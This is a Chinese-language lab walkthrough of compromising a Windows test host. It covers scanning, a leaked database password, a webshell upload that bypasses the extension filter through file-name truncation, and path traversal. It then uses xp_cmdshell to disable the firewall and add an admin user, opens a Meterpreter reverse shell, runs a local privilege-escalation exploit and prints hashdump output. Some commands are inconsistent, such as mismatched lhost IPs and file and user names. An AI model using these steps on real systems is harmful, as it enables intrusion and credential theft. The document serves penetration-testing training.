一.攻击过程

1.信息收集
（1）存活扫描
nmap 192.168.10.0/24

（2）端口扫描
之后进行全端口扫描
nmap -p- 192.168.10.139

发现端⼝：1433，这个端⼝是sql server的默认端⼝
得到端口27689 访问

（3）目录扫描
口令爆破无果
之后目录扫描查看是否泄露敏感文件
dirsearch -u http://192.168.10.139:27689

2.渗透测试
（1）进入后台
之后找到泄露敏感文件⼀般情况，bak⽂件是备份⽂件
通过windows得知是SQL server数据库并泄露连接地址和数据库密码
数据库：FileManage ⽤户：down 密码：downsql

尝试连接数据库

在UserList表中得到网站后台账号密码
admin/asdadwn_d2112

（2）登录后台

（3）文件上传

通过冰蝎生成木马

txt、jpg等⽂件可以上传
查看网站后缀但是发现 aspx无法上传

bup抓包查看内容，通过测试发现，只有允许的后缀名，才可以上传

多次上传文件发现文件名过长会截取固定字符长度所以上传⻓⽂件名，⽂件因为名称过⻓，导致溢出

构造webshell⽂件名：1sssssss.aspxaaaaaaaa.txt 成功上传

（4）找文件位置
方法一：报错查找
任意输入路径使系统报错找到存放文件路径

最后成功访问
http://192.168.10.139:27689/upfile/affix/638545863914255191-6sssssss.aspx

方法二：泄露查找
前面点击上传文件查看点击就会直接下载所以猜测会存在任意下载漏洞
根据url中aspx 页面报错信息成功下载文件

之后成功构造url 下载文件
http://192.168.10.139:27689/admin/file_down.aspx?file=../../admin/file_down.aspx

从代码中得知下载⽂件地址为："../upfile/affix/"+fileName

（5）连接wehshell
webshell地址
http://192.168.10.139:27689/upfile/affix/638545863914255191-6sssssss.aspx

之后使用冰蝎连接木马

3.提权
方法一： sqlserver 提权
查找到sql server sa 最高权限账号密码

查看系统信息
systeminfo

利⽤sql server 去执⾏命令

exec master..xp_cmdshell 'systeminfo';

systeminfo

查看当前系统配置
exec master..xp_cmdshell 'systeminfo';
查看当前权限
exec master..xp_cmdshell 'whoami';

启动远程桌⾯

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Serve
r" /v fDenyTSConnections /t REG_DWORD /d 0 /f

利⽤sql server 去执⾏命令

exec master..xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f';

关闭防⽕墙
net stop sharedaccess

利⽤sql server 去执⾏命令

exec master..xp_cmdshell 'net stop sharedaccess';

创建⽤户 user 密码 admin123
net user user admin123 /add

利⽤sql server 去执⾏命令

exec master..xp_cmdshell 'net user user admin123 /add';

将账号test加⼊administrators组

net localgroup administrators test /add

利⽤sql server 去执⾏命令

exec master..xp_cmdshell 'net localgroup administrators user /add'
net localgroup administrators test /add 将test 加入组

之后本机 win+r mstsc
user/admin123

登录成功

方法二：windows提权
生成木马文件
生成名为123的木马监听端口为6666
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.139 lport=6666 -f exe -o 123.exe

选择模块监听刚刚生成的木马文件
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.129
set lport 6666
run

将木马上传到目标机器

之后运行666.exe文件

成功反弹

查看权限
getuid

开始提权

查看当前系统存在哪些windows漏洞
bg
use multi/recon/local_exploit_suggester
set session 1 (session端口号)
run

session 其他命令
session 查看所有session链接
session -i （session id）切换session链接

选择漏洞模块运行
use exploit/windows/local/ms14_058_track_popup_menu
set session 1
run

再次查看权限发现已是最高权限 system
getuid

之后查看hash值
hashdump
最后面一部分为md5加密密码
Administrator:500:ac804745ee68ebea1aa818381e4e281b:3008c87294511142799dca1191e69a0f:::
ASPNET:1011:868404b8389cff2a6c788c7b3f79ee3e:8dd5dee460efce5b8c67adf8d88d6323:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
IUSR_CISP-PT:1008:4ebc7281c6ff8bc8e4150327a349b7a3:25b0c7214b64a17a03b207483c3a0b80:::
IWAM_CISP-PT:1009:103fcfaeaba52134d3f89e0703f150e3:62fc783e2af1efa255461a0a29e7477d:::
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:e01adc8164242e639fcd2d17a2bd60a6:::
test:1012:b4f85ca2d7ade3d2b0d3662b97ebed58:98d9ab770bb363e6e3117214ce061a9e:::
test1:1013:b4f85ca2d7ade3d2b0d3662b97ebed58:98d9ab770bb363e6e3117214ce061a9e:::
user:1014:ac804745ee68ebea1aa818381e4e281b:3008c87294511142799dca1191e69a0f:::